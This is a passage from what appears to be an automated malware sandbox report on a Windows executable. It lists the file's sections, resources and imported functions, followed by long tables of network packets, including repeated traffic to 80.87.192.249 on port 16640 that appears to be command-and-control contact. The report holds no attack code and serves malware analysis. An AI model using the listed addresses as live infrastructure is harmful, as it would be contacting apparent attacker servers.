                                                                                                                                                                                        .rsrc0x278f0000x3f680x4000False0.498046875data4.80279988584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .reloc0x27930000x134d00x13600False0.0702620967742data0.910567807007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                        RT_CURSOR0x27919080x130dataPolishPoland
                                                                                                                                                                                        RT_ICON0x278f2d00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4293872191, next used block 4293543741EnglishUnited States
                                                                                                                                                                                        RT_STRING0x2791b880x198dataPolishPoland
                                                                                                                                                                                        RT_STRING0x2791d200x6b2dataPolishPoland
                                                                                                                                                                                        RT_STRING0x27923d80x6f6dataPolishPoland
                                                                                                                                                                                        RT_STRING0x2792ad00x286dataPolishPoland
                                                                                                                                                                                        RT_STRING0x2792d580x20edataPolishPoland
                                                                                                                                                                                        RT_ACCELERATOR0x27918900x78dataPolishPoland
                                                                                                                                                                                        RT_GROUP_CURSOR0x2791a380x14dataPolishPoland
                                                                                                                                                                                        RT_GROUP_ICON0x27918780x14dataEnglishUnited States
                                                                                                                                                                                        RT_VERSION0x2791a500x134dataPolishPoland

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        KERNEL32.dllFindFirstChangeNotificationW, GetConsoleAliasExesLengthA, CallNamedPipeA, GetQueuedCompletionStatus, GetCommState, InterlockedDecrement, CancelWaitableTimer, UnlockFile, SetEvent, FreeEnvironmentStringsA, CreateNamedPipeW, GetNumberFormatA, ReadConsoleOutputA, GetCommandLineA, GetPrivateProfileIntA, GetSystemDirectoryW, HeapCreate, TerminateProcess, FileTimeToSystemTime, GetModuleFileNameW, lstrlenW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedExchange, GetStartupInfoA, FreeLibraryAndExitThread, GetLastError, SetThreadContext, GetProcAddress, SetStdHandle, EnterCriticalSection, LoadLibraryA, OpenMutexA, CreateSemaphoreW, LocalAlloc, GetProfileStringA, SetThreadIdealProcessor, HeapWalk, FindAtomA, GlobalWire, GetModuleHandleA, FreeEnvironmentStringsW, FindNextFileW, WriteProfileStringW, GetCurrentDirectoryA, GetCPInfoExA, SetFileShortNameA, TlsAlloc, EnumResourceLanguagesW, GetSystemTime, LCMapStringW, CopyFileExA, DeleteFileA, GetVolumeInformationW, GetThreadLocale, GetFileSize, MoveFileA, HeapValidate, IsBadReadPtr, RaiseException, GetModuleHandleW, Sleep, InterlockedIncrement, ExitProcess, TlsGetValue, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapFree, VirtualFree, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, CreateFileA, CloseHandle, FlushFileBuffers
                                                                                                                                                                                        ADVAPI32.dllInitiateSystemShutdownA

                                                                                                                                                                                        Version Infos

                                                                                                                                                                                        DescriptionData
                                                                                                                                                                                        Translation0x1209 0x04b8

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        PolishPoland
                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Sep 25, 2021 10:16:53.783557892 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:16:53.839941978 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:16:53.841943979 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:16:54.229598045 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:16:54.286509037 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:16:54.333441019 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:16:55.190648079 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:16:55.248460054 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:16:55.302261114 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:00.920835972 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:01.016854048 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:01.030544996 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:01.030601978 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:01.030664921 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:03.355149031 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:03.400701046 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:03.451303959 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:03.497216940 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:08.829241037 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:08.891834021 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:08.891874075 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:08.891896963 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:08.891928911 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:08.944075108 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:09.092582941 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:09.189949989 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:14.505820990 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:14.562540054 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:14.616463900 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:14.622395039 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:14.678181887 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:14.679383039 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:14.725820065 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:15.107157946 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:15.166562080 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:15.177196026 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:15.235296011 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:15.277865887 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:15.335424900 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:15.382210016 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:16.535523891 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:16.593260050 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:16.636070967 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:16.734664917 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:16.870675087 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:16.876553059 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:16.935976028 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:16.991595030 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.224006891 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.282571077 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.282628059 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.284214973 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.301512957 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.358683109 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.413682938 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.515614986 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.571528912 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.572599888 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.595638037 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.652065039 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.662467003 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.720802069 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.723012924 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.780867100 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.835427999 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.875255108 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:17.931761026 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:17.976094961 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.042984962 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.099625111 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.148056984 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.219296932 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.276297092 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.277338982 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.334252119 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.335941076 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.400064945 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.444924116 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603833914 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603883982 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603993893 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.604779959 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.604810953 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.058501005 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.058618069 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062360048 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062386990 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062704086 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.065613985 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.111149073 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.230475903 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.273114920 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379013062 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379031897 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379050016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379095078 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379147053 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379180908 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379196882 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379215002 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379225016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379234076 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379241943 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379256964 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379277945 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379288912 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379297972 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379319906 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379359007 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379367113 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.429384947 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528727055 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528743029 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528762102 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528800964 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528822899 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528837919 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528856039 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528949022 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529210091 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529220104 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529237032 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529253960 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529273033 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529285908 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529289007 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529342890 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529694080 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529702902 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529771090 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529791117 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529897928 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529964924 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529977083 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529989004 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.570008993 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678035975 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678051949 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678071022 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678107977 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678134918 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678144932 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678247929 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678248882 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678256989 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678277016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678284883 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678287983 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678318024 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678335905 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678347111 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678394079 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678431034 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678563118 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678572893 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678596973 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678617954 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678627968 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678637028 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678679943 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678688049 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678713083 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678858995 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678881884 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678910971 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678952932 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678961039 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678997993 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679169893 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679193020 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679236889 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679253101 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679320097 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679455042 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679481030 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679527044 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679529905 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679541111 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679579020 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679620981 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679724932 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679749012 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679795027 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679796934 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679806948 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679830074 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679857969 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.680695057 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.681869984 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827614069 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827649117 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827723980 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827780008 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827811003 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827853918 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827873945 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827925920 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827933073 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827970028 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.827994108 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828035116 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828047037 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828089952 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828202963 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828227997 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828270912 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828280926 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828310013 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828414917 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828444004 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828483105 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828490973 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828511953 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828540087 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828548908 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.828586102 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.830236912 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.839713097 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:20.840604067 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:20.841377974 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:20.937177896 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:20.981806040 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.076931953 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.098222017 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.148591042 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.313342094 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.369980097 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.370012045 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.370170116 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.445821047 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.502923012 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.511142969 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:21.569595098 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:21.617070913 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:22.283147097 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:22.381196022 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:22.614346981 CEST4973716640192.168.2.680.87.192.249

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Sep 25, 2021 10:16:35.244121075 CEST6204453192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:16:35.271393061 CEST53620448.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:07.094274044 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:07.114228964 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:09.548855066 CEST6426753192.168.2.68.8.8.8
